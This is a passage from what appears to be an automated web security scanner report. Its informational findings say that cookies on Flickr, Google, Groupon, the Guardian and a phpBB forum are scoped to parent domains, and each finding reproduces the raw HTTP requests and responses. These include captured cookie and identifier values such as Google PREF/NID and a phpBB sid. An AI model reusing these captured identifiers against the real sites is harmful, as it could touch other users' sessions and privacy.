  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795390991/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:10 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com
X-Served-By: www57.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88056

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-05-21 14.19.55 | Flickr
...[SNIP]...

13.208. http://www.flickr.com/photos/favoritltd/4795392149/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795392149/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795392149/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:48 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com
X-Served-By: www88.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 86022

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-03-05 17.55.24 | Flickr
...[SNIP]...

13.209. http://www.flickr.com/photos/favoritltd/4795392811/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795392811/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795392811/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com
X-Served-By: www30.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83646

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-04-13 10.18.02 | Flickr
...[SNIP]...

13.210. http://www.flickr.com/photos/favoritltd/4796022554/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4796022554/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4796022554/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com
X-Served-By: www29.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-03-29 14.38.40 | Flickr
...[SNIP]...

13.211. http://www.flickr.com/photos/favoritltd/4796024690/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4796024690/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
  • cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
  • cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
  • fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4796024690/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:55 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com
X-Served-By: www65.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-04-13 10.21.19 | Flickr
...[SNIP]...

13.212. http://www.forumas.lithuanianjoomla.com/download.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forumas.lithuanianjoomla.com
Path:   /download.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • phpbb3_9muwo_sid=268944692a8c1c07819ad84fccd17809; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /download.php HTTP/1.1
Host: www.forumas.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:37 GMT
Server: Apache
Set-Cookie: phpbb3_9muwo_u=1; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_k=; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_sid=268944692a8c1c07819ad84fccd17809; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="lt-lt" xml:lang="lt-lt">
<head>
...[SNIP]...

13.213. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance?hl=en&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:58 GMT
Expires: Mon, 24 Jan 2011 16:39:58 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

13.214. http://www.google.com/setprefs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /setprefs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:47 GMT
Server: gws
Content-Length: 219
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>
...[SNIP]...

13.215. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /url?sa=p&pref=ig&pval=3&q=http://www.google.com/ig%3Fhl%3Den%26source%3Diglk&usg=AFQjCNFA18XPfgb7dKnXfKz7x7g1GDH1tg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/ig?hl=en&source=iglk
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com
Date: Mon, 24 Jan 2011 16:40:03 GMT
Server: gws
Content-Length: 243
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/ig?hl=en&a
...[SNIP]...

13.216. http://www.groupon.com/washington-dc/subscribe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /washington-dc/subscribe

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
  • _tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
  • _thepoint=e54b532010193ffb80929de47a093240; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:06 GMT; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /washington-dc/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Explorer&d=District_of_Columbia_-_Washington&p=joomlacode.org&a=Text/ HTTP/1.1
Host: www.groupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 04:41:06 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: adchemy_id=Explorer; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: _tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: b=525bb898-283d-11e0-a3b5-005056957e9b; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: s=525bc5ae-283d-11e0-a3b5-005056957e9b; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: opt_default=7980234323; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: opt_7980234323_v=0; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: visited=true; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: _thepoint=e54b532010193ffb80929de47a093240; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:06 GMT; HttpOnly
Status: 200
ETag: "cc98647c2c5c60b56a748ca5db959984"
X-S-COOKIE: 525bc5ae-283d-11e0-a3b5-005056957e9b
X-B-COOKIE: 525bb898-283d-11e0-a3b5-005056957e9b
X-Runtime: 72
Content-Length: 24855
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...

13.217. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
  • GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x22 HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:10 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 07
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.218. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
  • GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:09 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.219. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
